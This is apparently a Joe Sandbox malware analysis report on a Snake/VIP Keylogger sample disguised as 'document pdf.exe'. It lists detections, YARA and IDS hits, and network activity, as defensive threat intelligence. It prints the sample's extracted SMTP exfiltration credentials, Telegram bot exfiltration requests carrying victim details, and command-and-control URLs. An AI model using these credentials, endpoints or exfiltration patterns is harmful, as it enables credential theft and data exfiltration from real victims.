Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
document pdf.exe

Overview

General Information

Sample name:document pdf.exe
Analysis ID:1584835
MD5:c67b6ff2d472bf82dc4da545dbc37a43
SHA1:c5e677e5e48d5ca965b6e2d3f0c8b56fb80e7be5
SHA256:df3c8cc4eaf6b0a8a6a0254c54160486df1b38f8a6591a60dbc520f38389c400
Tags:exeSnakeKeyloggeruser-James_inthe_box
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • document pdf.exe (PID: 3420 cmdline: "C:\Users\user\Desktop\document pdf.exe" MD5: C67B6FF2D472BF82DC4DA545DBC37A43)
    • document pdf.exe (PID: 2672 cmdline: "C:\Users\user\Desktop\document pdf.exe" MD5: C67B6FF2D472BF82DC4DA545DBC37A43)
    • WerFault.exe (PID: 3352 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 1340 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "director@igakuin.com", "Password": "wVCMFq@2wVCMFq@2", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "director@igakuin.com", "Password": "wVCMFq@2wVCMFq@2", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.4665157890.0000000002C63000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2de09:$a1: get_encryptedPassword
          • 0x2e126:$a2: get_encryptedUsername
          • 0x2dc19:$a3: get_timePasswordChanged
          • 0x2dd22:$a4: get_passwordField
          • 0x2de1f:$a5: set_encryptedPassword
          • 0x2f4ba:$a7: get_logins
          • 0x2f41d:$a10: KeyLoggerEventArgs
          • 0x2f082:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 14 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.document pdf.exe.4431ca0.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.document pdf.exe.4431ca0.2.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.document pdf.exe.4431ca0.2.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.document pdf.exe.4431ca0.2.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2c209:$a1: get_encryptedPassword
                • 0x2c526:$a2: get_encryptedUsername
                • 0x2c019:$a3: get_timePasswordChanged
                • 0x2c122:$a4: get_passwordField
                • 0x2c21f:$a5: set_encryptedPassword
                • 0x2d8ba:$a7: get_logins
                • 0x2d81d:$a10: KeyLoggerEventArgs
                • 0x2d482:$a11: KeyLoggerEventArgsEventHandler
                0.2.document pdf.exe.4431ca0.2.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x39f4e:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x395f1:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x3984e:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3a22d:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 27 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Suspicious Outbound SMTP Connections
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.199.225, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\document pdf.exe, Initiated: true, ProcessId: 2672, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49890

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-06T16:01:13.092549+010028033053Unknown Traffic192.168.2.649750188.114.96.3443TCP
                2025-01-06T16:01:14.845558+010028033053Unknown Traffic192.168.2.649769188.114.96.3443TCP
                2025-01-06T16:01:16.236493+010028033053Unknown Traffic192.168.2.649778188.114.96.3443TCP
                2025-01-06T16:01:17.739768+010028033053Unknown Traffic192.168.2.649790188.114.96.3443TCP
                2025-01-06T16:01:22.185426+010028033053Unknown Traffic192.168.2.649825188.114.96.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-06T16:01:11.323685+010028032742Potentially Bad Traffic192.168.2.649731132.226.8.16980TCP
                2025-01-06T16:01:12.526830+010028032742Potentially Bad Traffic192.168.2.649731132.226.8.16980TCP
                2025-01-06T16:01:14.276805+010028032742Potentially Bad Traffic192.168.2.649756132.226.8.16980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-06T16:01:25.666289+010018100071Potentially Bad Traffic192.168.2.649847149.154.167.220443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "director@igakuin.com", "Password": "wVCMFq@2wVCMFq@2", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
                Source: 0.2.document pdf.exe.43ee280.1.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "director@igakuin.com", "Password": "wVCMFq@2wVCMFq@2", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}
                Multi AV Scanner detection for submitted file
                Source: document pdf.exeVirustotal: Detection: 73%Perma Link
                Source: document pdf.exeReversingLabs: Detection: 65%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: document pdf.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: document pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49744 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49847 version: TLS 1.2
                Source: document pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Xml.ni.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: mscorlib.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: Accessibility.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.ni.pdbRSDS source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Drawing.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: mscorlib.ni.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Xml.pdb< source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Core.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Core.pdbMZ source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.pdb4 source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Configuration.ni.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Configuration.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Xml.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.ni.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Core.ni.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WERA83F.tmp.dmp.6.dr
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then jmp 00F1F45Dh3_2_00F1F2C0
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then jmp 00F1F45Dh3_2_00F1F4AC
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then jmp 00F1FC19h3_2_00F1F961
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then jmp 066931E0h3_2_06692DC8
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then jmp 06690D0Dh3_2_06690B30
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then jmp 06691697h3_2_06690B30
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then jmp 06692C19h3_2_06692968
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06690673
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then jmp 0669E0A9h3_2_0669DE00
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then jmp 0669E959h3_2_0669E6B0
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then jmp 0669F209h3_2_0669EF60
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then jmp 0669CF49h3_2_0669CCA0
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then jmp 0669D7F9h3_2_0669D550
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then jmp 066931E0h3_2_06692DC2
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then jmp 0669E501h3_2_0669E258
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then jmp 0669EDB1h3_2_0669EB08
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then jmp 0669F661h3_2_0669F3B8
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06690040
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06690853
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then jmp 0669FAB9h3_2_0669F810
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then jmp 0669D3A1h3_2_0669D0F8
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then jmp 066931E0h3_2_0669310E
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 4x nop then jmp 0669DC51h3_2_0669D9A8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49847 -> 149.154.167.220:443
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.document pdf.exe.43ee280.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.6:49890 -> 208.91.199.225:587
                Source: global trafficTCP traffic: 192.168.2.6:51718 -> 162.159.36.2:53
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:680718%0D%0ADate%20and%20Time:%2007/01/2025%20/%2000:14:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20680718%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49756 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49731 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49769 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49790 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49750 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49778 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49825 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.6:49890 -> 208.91.199.225:587
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49744 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:680718%0D%0ADate%20and%20Time:%2007/01/2025%20/%2000:14:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20680718%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: us2.smtp.mailhostbox.com
                Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 06 Jan 2025 15:01:25 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002C63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002C63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                Source: document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:680718%0D%0ADate%20a
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002C07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002BF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enh
